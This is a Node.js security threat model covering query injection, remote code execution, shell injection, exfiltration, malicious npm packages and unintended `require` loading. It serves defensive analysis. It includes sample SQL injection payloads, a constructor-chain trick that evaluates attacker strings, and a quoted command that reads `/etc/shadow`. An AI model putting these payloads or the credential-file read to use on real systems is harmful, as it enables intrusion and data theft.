> unknowingly created insecure apps.

> ...

> The human aspect can be improved through better education for
> developers.  Sadly, this approach is unlikely to be a complete
> solution. It is unreasonable to expect a developer to be a security
> expert when most of their time is spent on other aspects of software
> design.

Code that uses cryptography badly can seem like it's working as intended
until an attacker unravels it.
Testing code that uses cryptographic APIs is hard.  It's hard to write
a unit test to check that a skilled cryptographer can't efficiently
extract information from a random looking string or compute a random
looking string that passes a verifier.

Weak cryptography can also mask other problems.  For example, a
security auditor might try to check for leaks of email addresses by
creating a dummy account `Carol <carol@example.com>` and checking for
the string `carol@example.com` in data served in responses, recursing
into substrings encoded using base64, gzip, or other common encodings.
If some of that data is poorly encrypted, the auditor's search will not
find the address, and the auditor might falsely conclude that emails do
not leak, even though an attacker who can break the weak encryption can
read them.
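The auditor's check described above can be sketched as a recursive
search.  This is a minimal sketch under stated assumptions:
`containsCanary` is a hypothetical helper, only gzip and base64 are
handled, and base64 is located with a simple heuristic.  Like the
auditor, it cannot see an address hidden behind encryption, weak or
strong.

```js
'use strict';
const zlib = require('zlib');

// Runs of 8+ base64 characters with optional padding.  This heuristic is an
// assumption: it misses base64 that abuts other alphanumeric text.
const BASE64_RUN = /[A-Za-z0-9+/]{8,}={0,2}/g;

// Hypothetical auditor helper: does `data` contain `canary`, either directly
// or inside gzip- or base64-encoded content, up to `depth` layers deep?
function containsCanary(data, canary, depth = 3) {
  const buf = Buffer.isBuffer(data) ? data : Buffer.from(String(data), 'utf8');
  if (buf.includes(canary)) return true;
  if (depth <= 0) return false;
  // gzip streams start with the magic bytes 0x1f 0x8b.
  if (buf.length > 2 && buf[0] === 0x1f && buf[1] === 0x8b) {
    try {
      if (containsCanary(zlib.gunzipSync(buf), canary, depth - 1)) return true;
    } catch (e) {
      // Not valid gzip after all; try the other decodings.
    }
  }
  // latin1 maps each byte to one character, so binary data survives.
  const text = buf.toString('latin1');
  for (const [run] of text.matchAll(BASE64_RUN)) {
    if (containsCanary(Buffer.from(run, 'base64'), canary, depth - 1)) {
      return true;
    }
  }
  return false;
}

const email = 'carol@example.com';
const encoded = Buffer.from(email).toString('base64');
console.log(containsCanary(`{"contact":"${encoded}"}`, email)); // true
```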

[Cairns & Steel]: https://www.w3.org/2014/strint/papers/48.pdf


================================================
FILE: chapter-1/threat-DEX.md
================================================
# Poor Developer Experience

Security specialists have a vested interest in keeping developers
happy & productive.

Developer experience is not only a business or usability threat.  When
a team is less agile, it cannot respond as effectively to security
threats, or roll out interfaces that let end users manage their own
security and privacy.

Application developers may miss deadlines, cut features, or
compromise maintainability if any of the following are true:

*  starting a new project takes too long
*  they often cannot make progress until they get feedback from
   security specialists (or other specialists like I18N, Legal, UI)
*  repeated tasks are slow:
   *  restarting an application or service,
   *  running `npm install`, or
   *  rerunning tests after small changes
*  getting approval for a pull request takes long enough that
   upstream has to be manually merged into the branch.
*  breaking common code out of an application into an npm
   module becomes hard, so it is easier to copy-paste from one
   application to another
*  a developer has to spend significant time getting a release
   candidate approved instead of working on the next iteration.


================================================
FILE: chapter-1/threat-DOS.md
================================================

# Denial of Service

Denial of service occurs when a well-behaved, authorized user cannot
access a system because of misbehavior by another.

"Denial of service" is most often associated with [flooding][] a
network endpoint so it cannot respond to the smaller number of
legitimate requests, but there are other vectors:

*  Causing the server to use up [a finite resource][res-exh]
   like file descriptors, causing threads to block.
*  Causing the target to issue a network request to an endpoint the
   attacker controls and responding slowly.
*  Causing the target to store malformed data which triggers an error
   in code that unpacks the stored data and causes a server to provide
   an error response to a well-formed request.
*  Exploiting event dispatch bugs to cause starvation
   ([example][disclosure]).
*  Supplying over-large inputs to super-linear (> O(n)) algorithms.
   For example, supplying a crafted string to an ambiguous `RegExp`
   to cause [excessive backtracking][].
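To make the last item concrete, here is a minimal sketch with illustrative patterns (not taken from any particular module). In `/^(a+)+$/` a run of `a`s can be split between the inner and outer `+` in exponentially many ways, so when a crafted input forces the overall match to fail, a backtracking engine such as V8's may try every split. `/^a+$/` accepts exactly the same strings without that ambiguity.

```js
// Ambiguous: a run of "a"s can be divided between the inner and outer
// `+` in exponentially many ways, and a failing match may try them all.
const ambiguous = /^(a+)+$/;

// Unambiguous: accepts the same strings, but each character can be
// consumed in only one way.
const unambiguous = /^a+$/;

// Times a single match attempt, in milliseconds.
function timeMatch(re, input) {
  const start = process.hrtime.bigint();
  re.test(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Crafted inputs: a run of "a" followed by a character that makes the
// overall match fail.
for (const n of [10, 15, 20]) {
  const input = 'a'.repeat(n) + '!';
  console.log(n,
      timeMatch(ambiguous, input).toFixed(2),
      timeMatch(unambiguous, input).toFixed(3));
}
```

Exact timings depend on the machine and engine version, so the sketch prints them rather than asserting them; on a backtracking engine the first column typically grows by a constant factor with each extra `a`, while the second stays near zero.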

Denial of service attacks that exploit the network layer are usually
handled in the reverse proxy, and we find no reason to suppose that
Node.js applications are especially vulnerable to other kinds of denial
of service.

## Additional risk: Integrity depends on quick completion

A system requires [atomicity][] when two or more effects have to
happen together or not at all.  Databases put a lot of engineering
effort into ensuring atomicity.

Sometimes, ad-hoc code seems to preserve atomicity when tested under
low-load conditions:

```js
// foo() and bar() need to happen together or not at all.
foo(x);
// Not much of a gap here under normal conditions for another part
// of the system to observe foo() but not bar().
try {
  bar(x);
} catch (e) {
  undoFoo(x);
  throw e;
}
```

This code, though buggy, may be highly reliable under normal
conditions, but may fail under load, or if an attacker can cause
`bar()` to run for a while before its side-effect happens, for example
by causing excessive backtracking in a regular expression used to
check a precondition.
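A minimal sketch of how the window widens, assuming an in-memory ledger and a hypothetical `slowCheck` that stands in for a precondition whose running time an attacker can influence. The sketch puts an `await` between the two effects so that the gap is observable inside a single Node.js process; with synchronous code like the snippet above, the observer would instead be another process or a shared database.

```js
// Hypothetical stand-in for a precondition check whose duration an
// attacker can influence (e.g. a slow regular expression or backend call).
const slowCheck = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

// Moves `amount` from alice to bob. Both updates must happen together,
// but the function yields between them.
async function transfer(ledger, amount, checkMs) {
  ledger.alice -= amount;    // first effect, like foo(x)
  await slowCheck(checkMs);  // window in which other tasks can run
  ledger.bob += amount;      // second effect, like bar(x)
}

// Starts a transfer and, concurrently, an observer that sums balances.
async function observeTotals(checkMs) {
  const ledger = { alice: 100, bob: 0 };
  const total = () => ledger.alice + ledger.bob;
  const pending = transfer(ledger, 10, checkMs);
  await slowCheck(10);       // the observer runs about 10 ms later
  const during = total();
  await pending;
  return { during, after: total() };
}

(async () => {
  console.log(await observeTotals(50)); // { during: 90, after: 100 }
  console.log(await observeTotals(0));  // { during: 100, after: 100 }
})();
```

With a fast check the observer never sees the half-finished state, which is why such bugs survive low-load testing; a slow check exposes it.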

Some of the same techniques that make a system unavailable can
widen the window of vulnerability within which an attacker can exploit
an atomicity failure.

Client-side, runaway computations rarely escalate into an integrity
violation since atomicity requirements are typically maintained on the
server.  Server-side, we expect that this problem would be more
common.

[flooding]: https://capec.mitre.org/data/definitions/125.html
[excessive backtracking]: https://www.regular-expressions.info/catastrophic.html
[res-exh]: https://capec.mitre.org/data/definitions/131.html
[disclosure]: https://sandstorm.io/news/2015-04-08-osx-security-bug
[atomicity]: https://en.wikipedia.org/wiki/ACID#Atomicity


================================================
FILE: chapter-1/threat-EXF.md
================================================
# Exfiltration of Data

"Exfiltration" happens when an attacker causes a response to include
data that it should not have.  Web applications and services may
produce response bodies that include too much information.

This can happen when server-side JavaScript has access to more
data than it needs to do its job and either

*  it serializes unintended information and no one notices or
*  an attacker controls what is serialized.

Consider

```js
Object.assign(output, this[str]);
```

If the attacker controls `str` then they may be able to pick any field
of `this` or possibly any global field.
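A minimal sketch of the problem, assuming a hypothetical `Session` class whose `view` method copies whichever property the caller names. Nothing in `view` mentions the sensitive field, which is what makes this pattern hard to audit. The `safeView` variant shows one way to narrow the choice to an explicit allowlist.

```js
// Hypothetical class; field names and values are illustrative only.
class Session {
  constructor() {
    this.profile = { name: 'Ada' };
    this.credentials = { apiKey: 'example-key' };
  }

  // Vulnerable: `str` picks which property of `this` gets serialized.
  view(str) {
    const output = {};
    Object.assign(output, this[str]);
    return output;
  }

  // Narrower: only names on an explicit allowlist can be copied.
  safeView(str) {
    if (!Session.VIEWABLE.has(str)) {
      throw new Error('not viewable: ' + str);
    }
    return Object.assign({}, this[str]);
  }
}
Session.VIEWABLE = new Set(['profile']);

const session = new Session();
console.log(JSON.stringify(session.view('profile')));     // {"name":"Ada"}
console.log(JSON.stringify(session.view('credentials'))); // {"apiKey":"example-key"}
```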

This problem is not new to Node.js, but we consider it more frequent
in Node.js for these reasons:

*  There is no equivalent to `Object.assign` in most backend languages.
   It's possible in Python and Java via reflective operators but
   security auditors can narrow down code that might suffer this vulnerability
   to code that uses reflection.
   `Object.assign`, `$.extend` and similar operators are widely used in
   idiomatic JavaScript.
*  In most backend languages, `obj[...]` does not allow aliasing of all
   properties.
   For example, Python allows `obj[...]` on types that implement `__getitem__`,
   which user-defined classes do not do by default.
   Java has generic collections and maps, but for user-defined classes
   the equivalent code pattern requires reflection and possibly calls to
   `setAccessible(true)`.

JavaScript makes it easier to alias properties and methods and common
JavaScript idioms make it harder for security auditors to narrow down
code that might inadvertently allow exfiltration.

`Object.assign` and related copy operators are also potential
[mass assignment][] vectors as in:

```js
Object.assign(systemData, JSON.parse(untrustedInput))
```
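A minimal sketch of mass assignment and of an allowlist-based alternative. The record shape, the `role` field, and the `EDITABLE_FIELDS` list are hypothetical, chosen only to show a client setting a field it should not control.

```js
// Vulnerable: every key in the parsed request body is copied onto the
// record, including keys the client should not be able to set.
function updateProfile(systemData, untrustedInput) {
  return Object.assign(systemData, JSON.parse(untrustedInput));
}

// Hypothetical allowlist of client-editable fields.
const EDITABLE_FIELDS = ['displayName', 'email'];

// Copies only allowlisted keys that the parsed body actually has.
function updateProfileSafely(systemData, untrustedInput) {
  const parsed = JSON.parse(untrustedInput);
  for (const key of EDITABLE_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(parsed, key)) {
      systemData[key] = parsed[key];
    }
  }
  return systemData;
}

const body = '{"displayName":"mallory","role":"admin"}';
console.log(updateProfile({ displayName: 'm', role: 'user' }, body).role);       // admin
console.log(updateProfileSafely({ displayName: 'm', role: 'user' }, body).role); // user
```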

[mass assignment]: https://en.wikipedia.org/wiki/Mass_assignment_vulnerability


================================================
FILE: chapter-1/threat-LQC.md
================================================
# Low Quality Code

An application or service is vulnerable when its security depends on a
module upholding a contract that it does not uphold.

Most new software has bugs when first released.  Over time, maintainers
fix the bugs that have obvious, bad consequences.

Often, widely used software has problem areas that are well understood.
Developers can make a pragmatic decision to use it while taking
additional measures to make sure those problems don't compromise
security guarantees.

Orphaned code that has not been updated recently may have done a
good job of enforcing its contract, but attackers may have discovered
new tricks, or the threat environment may have changed, so it may
no longer enforce its contract in the face of an attack.

Low quality code constitutes a threat when developers pick a module
without understanding the caveats to the contract it actually
provides, or without taking additional measures to limit damage when
it fails.

There may be a higher risk of poorly understood contracts when a
community is experimenting rapidly, as is the case for Node.js, or
early on, before the community has settled on clear winners for core
functions, but we consider the frequency of vulnerabilities due to
low quality code in the npm repository roughly the same as for other
public module repositories.


================================================
FILE: chapter-1/threat-MTP.md
================================================
# Malicious Third-Party Code

Most open-source developers work in good faith to provide useful tools
to the larger community of developers, but

*  Many passwords are easy to guess, so attackers can suborn accounts
   that are only protected by a password.  On GitHub, developers may
   configure their accounts to require a
   [second factor][github-second-factor] but this is not yet the norm.
*  Pull requests that aren't thoroughly reviewed may dilute security
   properties.
*  Phishing requests targeted at GitHub users ([details][dimnie]) can
   execute code on unwary committers' machines.
*  A pull request may appear to come from a higher-reputation source
   ([details][unsigned commits]).

Malicious code can appear in the server-side JavaScript running in
production, or can take the form of install hooks that run on a
developer workstation with access to local repositories and to
writable elements of `$PATH`.

Projects that deploy the latest version of a dependency straight to
production are more vulnerable to malicious code.  If an attacker
manages to publish a version with malicious code which is quickly
discovered, it affects projects that deploy during that short "window
of vulnerability."  Projects that `npm install` the latest version
straight to production are more likely to fall in that window than
projects that cherry-pick versions or that shrinkwrap to make sure that
their development versions match deployed versions.
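To make the distinction concrete, here is a minimal sketch of a hypothetical check over a `package.json` `dependencies` object. Specifiers such as `^4.17.0` or `latest` let the next `npm install` pick up a version published minutes earlier. The check treats anything other than an exact `MAJOR.MINOR.PATCH` version as floating, which is a simplification (semver also allows prerelease and build suffixes). Pinning direct dependencies does not pin transitive ones; that is what `package-lock.json` or `npm-shrinkwrap.json` are for.

```js
// Simplification: only a plain MAJOR.MINOR.PATCH counts as pinned.
const EXACT_VERSION = /^\d+\.\d+\.\d+$/;

// Returns the names of dependencies whose specifier could resolve to a
// newly published version on the next `npm install`.
function findFloatingRanges(dependencies) {
  return Object.entries(dependencies)
      .filter(([, spec]) => !EXACT_VERSION.test(spec))
      .map(([name]) => name);
}

console.log(findFloatingRanges({
  'left-pad': '1.3.0',  // pinned
  'lodash': '^4.17.0',  // any 4.x at or above 4.17.0
  'express': 'latest',  // whatever the `latest` tag points to
}));
// [ 'lodash', 'express' ]
```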

[Bower is deprecated][bower-depr] so our discussions focus on
`npmjs.org`, but it's worth noting that Bower has a single point of
failure: anyone who can create a release branch can commit and
publish a new version.

[`npm profile`][npm profile] allows requiring
[two-factor auth][npm auth-and-writes] for publishing and privilege
changes.  If the npm accounts that can publish new versions of a
package only check out code from GitHub repositories whose committers
all use two-factor authentication, then there is no single password
that can compromise the system.

The frequency of malicious code vulnerabilities affecting Node.js is
probably roughly the same as that for other public module repositories.
The npm registry has been targeted in the past
([1][getcookies-disclosure], [2][crossenv-typosquat-disclosure]).

The [npm Blog][crossenv-typosquat-disclosure] explains what to do if
you believe you have found malicious code:

> On August 1, a user notified us via Twitter that a package with a
> name very similar to the popular `cross-env` package was sending
> environment variables from its installation context out to
> npm.hacktask.net. We investigated this report immediately and took
> action to remove the package. Further investigation led us to remove
> about 40 packages in total.
>
> ...
>
> Please do reach out to us immediately if you find malware on the
> registry. The best way to do so is by sending email to
> [security@npmjs.com](mailto:security@npmjs.com). We will act to
> clean up the problem and find related problems if we can.


[github-second-factor]: https://help.github.com/articles/about-two-factor-authentication/
[bower-depr]: https://bower.io/blog/2017/how-to-migrate-away-from-bower/
[dimnie]: https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/
[unsigned commits]: https://nvisium.com/resources/blog/2017/06/21/securing-github-commits-with-gpg-signing.html
[npm profile]: https://docs.npmjs.com/cli/profile
[saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
[npm auth-and-writes]: https://docs.npmjs.com/getting-started/using-two-factor-authentication
[getcookies-disclosure]: https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies
[crossenv-typosquat-disclosure]: http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry


================================================
FILE: chapter-1/threat-QUI.md
================================================
# Query Injection

[Query injection][] occurs when an attacker causes a query sent to a
database or other backend to have a [structure][spp] that differs from
the one the developer intended.

```js
connection.query(
    'SELECT * FROM Table WHERE key="' + value + '"',
    callback);
```

If an attacker controls `value` and can cause it to contain a double
quote (`"`), then they can cause execution of a query with a different
structure.
For example, if they can cause

```js
value = ' " OR 1 -- two dashes start a line comment';
```

then the query sent is `SELECT * FROM Table WHERE key=" " OR 1 -- ...`,
which returns more rows than intended, possibly [leaking](./threat-EXF.md)
data that the requester should not have been able to access, and may
cause other code that loops over the result set to modify rows other than
the ones the system's authors intended.

Some backends allow statement chaining, so compromising a statement
that seems only to read data:

```js
value = '"; INSERT INTO Table ... --'
```

can violate system integrity by forging records:

```js
' SELECT * FROM Table WHERE key="' + value + '" ' ===
' SELECT * FROM Table WHERE key=""; INSERT INTO Table ... --" '
```

or deny service via mass deletes.
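The usual defense keeps the query text fixed and sends untrusted values separately. Drivers such as the `mysql` npm module accept `?` placeholders with a values array (`connection.query(sql, [value], callback)`). The sketch below does not talk to a database; `concatQuery` and `paramQuery` are hypothetical helpers that only show that the parameterized SQL text is the same no matter what `value` contains.

```js
// Vulnerable: the query's structure depends on the contents of `value`.
function concatQuery(value) {
  return 'SELECT * FROM Table WHERE key="' + value + '"';
}

// Parameterized: the SQL text is fixed and `value` travels as data.
// (Hypothetical helper; a real driver would send `params` to the backend
// separately or escape them itself.)
function paramQuery(value) {
  return { sql: 'SELECT * FROM Table WHERE key=?', params: [value] };
}

const attack = ' " OR 1 -- two dashes start a line comment';
console.log(concatQuery(attack));
// SELECT * FROM Table WHERE key=" " OR 1 -- two dashes start a line comment"
console.log(paramQuery(attack).sql);
// SELECT * FROM Table WHERE key=?
```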

Query injection has a [long and storied history][hall-of-shame].

[Query injection]: http://bobby-tables.com/
[hall-of-shame]: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
[spp]: https://rawgit.com/mikesamuel/sanitized-jquery-templates/trunk/safetemplate.html#structure_preservation_property


================================================
FILE: chapter-1/threat-RCE.md
================================================
# Remote Code Execution

Remote code execution occurs when the application interprets an
untrustworthy string as code.  When `x` is a string, `eval(x)`,
`Function(x)`, and `vm.runIn*Context(x)` all invoke the JavaScript
engine's parser on `x`.  If an attacker controls `x` then they can run
arbitrary code in the context of the CommonJS module or `vm` context
that invoked the parser.

Sandboxing can help, but widely available sandboxes have
[known workarounds][denicola-vm-run], though the [frozen realms][]
proposal aims to change that.

It is harder to execute remote code in server-side JavaScript:
assigning `this[x][y] = "javascript:console.log(1)"` does not cause
code to execute for nearly as many `x` and `y` as in a browser.

These operators are probably rarely used *explicitly*, but some
operators that convert strings to code when given a string do
something else when given a `Function` instance.  `setTimeout(x, 0)`
is safe when `x` is a function, but in a browser it parses a string
input as code.
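To illustrate the function-versus-string distinction, here is a minimal sketch of a hypothetical `deferCall` guard for code that may run on both client and server. Node.js's own `setTimeout` already throws a `TypeError` when given a string, but browsers parse the string, so the guard makes the safe case the only case wherever the code ends up running.

```js
// Hypothetical wrapper: refuses anything but a function, so a string
// can never reach a browser's string-to-code path in setTimeout.
function deferCall(callback, ms) {
  if (typeof callback !== 'function') {
    throw new TypeError('deferCall expects a function, got ' + typeof callback);
  }
  return setTimeout(callback, ms);
}

deferCall(() => console.log('ran'), 0);  // schedules the function
try {
  deferCall('console.log("injected")', 0);
} catch (e) {
  console.log(e.name);  // TypeError
}
```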

*  [Grepping](../appendix/experiments.md#grep-problems) shows the rate
   in the top 100 modules and their transitive dependencies by simple
   pattern matching after filtering out comments and string content.
   This analysis works on most modules, but fails to distinguish
   safe uses of `setTimeout` in modules that might run on
   the client from unsafe ones.
*  A [type based analysis](../appendix/experiments.md#jsconf) can
   distinguish between those two, but the tools we tested don't
   deal well with mixed JavaScript and TypeScript inputs.

Even if we could reliably identify places where strings are
*explicitly* converted to code for the bulk of npm modules,
it is more difficult in JavaScript to statically prove that
code does not *implicitly* invoke a parser than in other
common backend languages.

```js
// Let x be any value not in
// (null, undefined, Object.create(null)).
var x = {},
// If the attacker can control three strings
    a = 'constructor',
    b = 'constructor',
    s = 'console.log("attacker code ran")';
// and trick code into doing two property lookups
// they control, a call with a string they control,
// and one more call with any arguments
x[a][b](s)();
// then they can cause any side-effect achievable
// solely via objects reachable from the global scope.
// (For x = {}, x[a] is Object and x[a][b] is Function,
// so s is parsed as the body of a new global function.)
// This includes full access to any exported module APIs,
// and access to builtin modules like child_process, fs,
// and net.
```

Filtering out values of `s` that "look like JavaScript" as they reach
server-side code will probably not prevent code execution.
[Yosuke Hasegawa][Yosuke] showed how to re-encode arbitrary JavaScript
using only 6 punctuation characters, and that number may
[fall to 5][Masato].  ["Web Application Obfuscation"][obfusc] by
Heiderich et al. catalogues ways to bypass filtering.

`eval` also allows remote code execution in Python, PHP, and
Ruby code, but in those languages `eval` operators are harder to
invoke implicitly, which means uses are easier to find and check.

It is possible to dynamically evaluate strings even in statically
compiled languages, for example, [JSR 223][] and
[`javax.compiler`][dynjava] for Java.  In statically compiled
languages there is no short implicit path to `eval`, and it is not
easier to `eval` an untrusted input than to use an interpreter that is
isolated from the host environment.

We consider remote code execution in Node.js lower frequency than for
client-side JavaScript without a Content-Security-Policy but higher
than for other backend languages.  We consider the severity the same
as for other backend languages.  The severity is higher than for
client-side JavaScript because backend code often has access to more
than one user's data and privileged access to other backends.

[denicola-vm-run]: https://gist.github.com/domenic/d15dfd8f06ae5d1109b0
[frozen realms]: https://github.com/tc39/proposal-frozen-realms
[Yosuke]: https://news.ycombinator.com/item?id=4370098
[Masato]: https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html
[obfusc]: https://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049
[JSR 223]: https://docs.oracle.com/javase/8/docs/technotes/guides/scripting/prog_guide/api.html
[dynjava]: https://www.ibm.com/developerworks/library/j-jcomp/index.html


================================================
FILE: chapter-1/threat-SHP.md
================================================
# Shell Injection during Production

[Shell injection][] occurs when an attacker-controlled string changes
the structure of a command passed to a shell or causes a child process
to run an unintended command, or to run a command with unintended
arguments.
Typically, this is because code or a dependency invokes
[child\_process][api/child_process] with an argument partially
composed from untrusted inputs.
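A minimal sketch contrasting the two `child_process` styles, assuming a POSIX `/bin/sh` for the vulnerable half. `execSync` hands its command string to a shell, so a `;` in the input starts a second command. `execFileSync` does not use a shell unless asked to, so the same string reaches the child as a single argument. Using the current Node.js binary (`process.execPath`) as the child keeps the sketch free of other dependencies.

```js
const { execFileSync, execSync } = require('child_process');

const untrusted = 'hello; echo INJECTED';

// Vulnerable: the whole string is interpreted by /bin/sh, which treats
// `;` as a command separator, so `echo INJECTED` also runs.
function echoViaShell(input) {
  return execSync('echo ' + input, { encoding: 'utf8' });
}

// Safer: no shell is involved; `input` is passed as one argv entry to a
// child that writes its last argument back to stdout.
function echoViaArgv(input) {
  return execFileSync(
      process.execPath,
      ['-e', 'process.stdout.write(process.argv[process.argv.length - 1])',
       input],
      { encoding: 'utf8' });
}

console.log(JSON.stringify(echoViaShell(untrusted))); // "hello\nINJECTED\n"
console.log(JSON.stringify(echoViaArgv(untrusted)));  // "hello; echo INJECTED"
```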

Shell injection may also occur during development and deployment.  For
example, [npm][npm hooks] and [Bower][bower hooks]
`{pre-,,post-}install` hooks may be subject to shell injection via
filenames that contain shell meta-characters in malicious transitive
dependencies, but we classify this as an [MTP][] vulnerability.

[MTP]: threat-MTP.md
[npm hooks]: https://docs.npmjs.com/misc/scripts
[bower hooks]: https://bower.io/docs/config/#hooks
[Shell injection]: http://cwe.mitre.org/data/definitions/77.html
[api/child_process]: https://nodejs.org/api/child_process.html


================================================
FILE: chapter-1/threat-UIR.md
================================================
# Unintended Require

If an attacker controls the `x` in `require(x)` then they can cause
code to load that was not intended to run on the server.

Our high-level, informal security argument for web applications looks
like:

1.  All code producing content for, and loaded into, *example.com*
    is written or vetted by developers employed by *example.com*.
2.  Those developers have the tools and support to do a good job, and
    organizational measures filter out those unwilling or unable to
    do a good job.
3.  Browsers enforce the same origin policy, so *example.com*'s code
    can make sure all access by third parties to data held on behalf
    of end users goes through *example.com*'s servers where
    authorization checks happen.
4.  Therefore, end users can make informed decisions about the degree
    of trust they extend to *example.com*.

Even if the first two premises are true, if production servers load
code that wasn't intended to run in production, then the conclusion
does not follow.  Developers do not vet test code the same way they
do production code and ought not have to.

This vulnerability may be novel to CommonJS-based module linking
(though we are not the first to report it ([details][prior art])) so we
discuss it in more depth than other classes of vulnerability.  Our
frequency and severity guesstimates have a high level of uncertainty.


## Dynamic `require()` can load non-production code

`require` only loads from the file-system under normal configurations
even though [CommonJS][modules spec] leaves "unspecified
whether modules are stored with a database, file system, or factory
functions, or are interchangeable with link libraries."

Even though, as-shipped, `require` only loads from the file-system, a
common practice of copying `node_modules` to the server makes
unintended require a more severe problem than one might expect.  Test
code often defines mini APIs that intentionally disable or circumvent
production checks, so causing test code to load in production can make
it much easier to escalate privileges or turn a limited code execution
vulnerability into an arbitrary code execution vulnerability.


## Availability of non-production code in `node_modules`

There are many modules `$m` such that `npm install "$m"` places test
or example files under `node_modules/$m`.

[Experiments](../appendix/experiments.md#test_code) show that, of the
top 108 most commonly used modules, 50 (46.30%) include test or
example code.  Some of these modules, like `mocha`, are most
often loaded as dev dependencies, but `npm install --only=prod`
will still produce a `node_modules` directory that has test and
example code for most projects.


## Non-production code differs from production code

We need to keep test code from loading in production.

Good developers do and should be able to do things in test code that
would be terrible ideas in production code.  It is not uncommon to
find test code that:

-  changes global configuration so that they can run tests under
   multiple different configurations.
-  defines methods that intentionally break abstractions so they
   can test how gracefully production code deals with marginal inputs.
-  parses test cases specified in strings and passes parts on to
   powerful reflective operators and `eval`-like operators.
-  `require`s modules specified in test case strings so they can
   run test cases in the context of plugins.
-  breaks private/public API distinctions to better interrogate
   internals.
-  disables security checks so they can test how gracefully
   a subcomponent handles dodgy inputs.
-  calls directly into lower-level APIs that assume that higher
   layers checked inputs and enforced access controls.
-  includes in output sensitive internal state (like PRNG seeds) to
   aid a developer in reproducing or tracking down the root cause of
   a test failure.
-  logs or includes in output information that would be sensitive
   if the code connected to real user data instead of a test database.
-  resets PRNG seeds to fixed values to make it easier to reproduce
   test failures.
-  adds additional "God mode" request handlers that allow a developer
   to interactively debug a test server.

These are not security problems when test environments neither access
real user data nor receive untrusted inputs.

## Unintended Require can activate non-production code

The primary vector for this vulnerability is dynamic code loading:
calling `require(...)` with an argument other than a literal string.
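A minimal sketch of the vector and of one way to close it, with hypothetical names. `loadPlugin` passes its argument straight to `require`, so any identifier that resolves under `node_modules`, including test helpers, can load. `loadPluginSafely` maps a fixed set of names to `require` calls with literal arguments, so only modules that appear in the source can load. Built-in modules stand in for real plugins to keep the sketch self-contained.

```js
// Vulnerable: any module identifier that reaches `name` is loaded.
function loadPlugin(name) {
  return require(name);
}

// Each entry uses a literal string, so the set of loadable modules is
// visible to reviewers and static analysis.
const PLUGINS = {
  path: () => require('path'),
  util: () => require('util'),
};

function loadPluginSafely(name) {
  // hasOwnProperty rejects inherited keys such as 'constructor'.
  if (!Object.prototype.hasOwnProperty.call(PLUGINS, name)) {
    throw new Error('unknown plugin: ' + name);
  }
  return PLUGINS[name]();
}

console.log(loadPluginSafely('path') === require('path')); // true
try {
  loadPluginSafely('some-module/test/helpers');  // hypothetical path
} catch (e) {
  console.log(e.message);  // unknown plugin: some-module/test/helpers
}
```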

To assess the severity of this issue, we [examined](../appendix/experiments.md)
the 108 most popular npm modules.

34 of the top 108 most popular npm modules (about 31%) call `require(...)`
without a literal string argument or have a non-test dependency that
does.  This is after imperfect heuristics to filter out non-production
code.  If we assume, conservatively, that uses of `require` that are
not immediate calls are dynamic load vectors, then the proportion
rises to 50%.  See [appendix](../appendix/experiments.md#dynamic_load).

Below are the results of a manual human review of dynamic loads in
popular npm modules.  There seem to be few clear vulnerabilities among
the top 108 modules, but the kind of reasoning required to check this
is not automatable; note the use of phrases like "developers probably
won't" and "the module is typically used to".

Determining which dynamic loads are safe among the long tail of less
widely used modules would be difficult.

----

Some dynamic loads are safe.  Jade, a deprecated version of PugJS, does

```js
function getMarkdownImplementation() {
  var implementations = ['marked', 'supermarked',
                         'markdown-js', 'markdown'];
  while (implementations.length) {
    try {
      require(implementations[0]);
```

This is not vulnerable.  It tries to satisfy a dependency by
iteratively loading alternatives until it finds one that is available.

Babel-core v6's file transformation module ([code][babel-core dyn load])
loads plugins thus:

```js
var parser = (0, _resolve2.default)(parserOpts.parser, dirname);
if (parser) {
  parseCode = require(parser).parse;
```

This looks in an options object for a module identifier.  It's
unlikely that this particular code in babel is exploitable since
developers probably won't let untrusted inputs specify parser options.

The popular colors module ([code][colors dyn load]) treats the argument
to `setTheme` as a module identifier.

```js
colors.setTheme = function (theme) {
  if (typeof theme === 'string') {
    try {
      colors.themes[theme] = require(theme);
```

This is unlikely to be a problem since the module is typically used to
colorize console output.  HTTP response handling code will probably
not load `colors`, so an untrusted input will probably not reach
`colors.setTheme`.
If an attacker can control the argument to `setTheme`, then they can
load an arbitrary JavaScript source file or C++ addon.

The popular browserslist module ([code][browserlist dyn load]) takes
part of a query string and treats it as a module name:

```js
  {
    regexp: /^extends (.+)$/i,
    select: function (context, name) {
      if (!context.dangerousExtend) checkExtend(name)
      // eslint-disable-next-line security/detect-non-literal-require
      var queries = require(name)
```

Hopefully browserslist queries are not specified by untrusted inputs,
but if they are, an attacker can load arbitrary available source files
since `/(.+)$/` will match any module identifier.

The popular express framework loads file-extension-specific code
as needed.  If express views are lazily initialized based on a portion
of the request path without first checking that the path should have a
view associated, then the following runs ([code][express dyn load]):

```js
if (!opts.engines[this.ext]) {
  // load engine
  var mod = this.ext.substr(1)
  debug('require "%s"', mod)

  // default engine export
  var fn = require(mod).__express
```

This would seem to allow loading top-level modules by requesting a
view name like `foo.toplevelmodule`, though not local source files
whose identifiers must contain `.` and `/`.  Loading top-level modules
does not, by itself, allow loading non-production code, so this is
probably not vulnerable to this attack.  It may be possible to use a
path like `/base.\foo\bar` to cause `mod = "\\foo\\bar"` which may
allow loading arbitrary source files on Windows, but it would only allow
loading the module for initialization side effects unless it
coincidentally provides significant abusable authority under
`exports.__express`.

----

This analysis suggests that the potential for exploiting unintended
require is low in projects that only use the 100 most popular modules,
but the number and variety of dynamic `require()` calls in the top 108
modules suggests potential for exploitable cases in the top 1000
modules, and we know of no way to automatically vet modules for UIR
vulnerabilities.

## Unintended require can leak information

[Fernando Arnaboldi][diff fuzz] showed that unintended requires can
leak sensitive information if attackers have access to error messages.

> ```sh
> # node -e "console.log(require('/etc/shadow'))"
> ```
>
> ...
>
> The previous example exposes the first line of
> /etc/shadow, which contains the encrypted root password.

See also [exfiltration][EXF].


